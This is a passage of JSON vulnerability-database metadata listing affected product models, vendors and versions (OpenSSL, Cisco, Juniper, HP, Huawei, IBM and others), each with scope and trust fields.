"trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.4" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.5" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.20" }, { "model": "oceanstor s5600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "paging server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "9500e family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "ace application control engine module ace20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "msr30-16 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.2" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0.1880" }, { "model": "hyperdp oceanstor n8500 v200r001c09", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.2" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.10" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0.2354" }, { "model": "agent desktop for cisco unified contact center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "toolscenter suite", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.53" }, { "model": "simatic s7-1500", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "telepresence ip vcr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "msr20-1x russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "unified communications series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "si switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55000" }, { "model": "virusscan enterprise for linux", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "ape", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "hyperdp v200r001c91spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.1" }, { "model": "unified attendant console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security threat response manager 2012.1r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "dsr-500 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "s3900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.1" }, { "model": "documentum content server sp1 p26", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.6" }, { "model": "junos 12.1x44-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security information and event management hf11", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.3.2" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.5" }, { "model": "junos 12.1x45-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "eupp v100r001c01spc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ace application control engine module ace10", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 10.4s15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "20" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "ecns600 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "36100" }, { "model": "junos 13.2r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hi switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55000" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "msr30-1x russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.7" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "oceanstor s2600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "msr9xx family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "msr2000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "10.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "aura presence services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.2" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.12" }, { "model": "junos os 13.3r2-s3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "msr30 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "manageone v100r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463011.5" }, { "model": "junos 12.2r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "ave2000 v100r001c00sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security information and event management ga", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.4.0" }, { "model": "svn2200 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125000" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.2" }, { "model": "esight-ewl v300r001c10spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ave2000 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.4" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "tsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "usg9500 v300r001c01spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "msr30-16 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "imc ead", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.00" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.1" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3600v20" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "fortios b064", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "documentum content server sp2 p15", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "10.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.3" }, { "model": "usg9500 v300r001c20sph102", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "fortios", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.0.8" }, { "model": "asa cx context-aware security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.13" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "msr4000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "unified im and presence services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.2r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.21" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "usg9300 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network intrusion prevention system gv200", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "elog v100r003c01spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "anyoffice v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.5" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.6" }, { "model": "vpn client v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "metro ethernet series access devices", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "12000" }, { "model": "mcp russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66000" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.1" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.2" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "s5900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s6900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ecns610 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.1" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "a6600 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "junos 12.1r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "f5000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "19100" }, { "model": "fusionsphere v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.1" }, { "model": "junos 13.3r2-s3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "usg9500 usg9500 v300r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tsm v100r002c07spc219", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u2990 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "espace iad v300r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos r11", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "ace application control engine appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "documentum content server sp1 p28", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.3" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66020" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.4x27.62" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "oceanstor s5600t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos os 12.1x44-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x47" }, { "model": "security network intrusion prevention system gx7412-10", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "espace iad v300r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "virusscan enterprise for linux", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "1.9" }, { "model": "pk family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1810v10" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "junos os 13.3r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59200" }, { "model": "oceanstor s6800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "manageone v100r001c02 spc901", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 11.4r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-2" }, { "model": "project openssl 1.0.0m", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 12.1x45-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "oceanstor s2600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "dsr-500n rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "project openssl m", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s2750\u0026s5700\u0026s6700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "4210g switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "oceanstor s5800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "isoc v200r001c02spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "junos r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "14.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "ons series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154000" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "nip2000\u00265000 v100r002c10spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hyperdp v200r001c09spc501", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "webapp secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.8.0" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.7.0" }, { "model": "security threat response manager", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "eupp v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ei switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55000" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "junos 13.1r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "dsr-500 rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "policy center v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "junos d15", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45-" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9900" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59000" }, { "model": "updatexpress system packs installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "oceanstor s5800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, 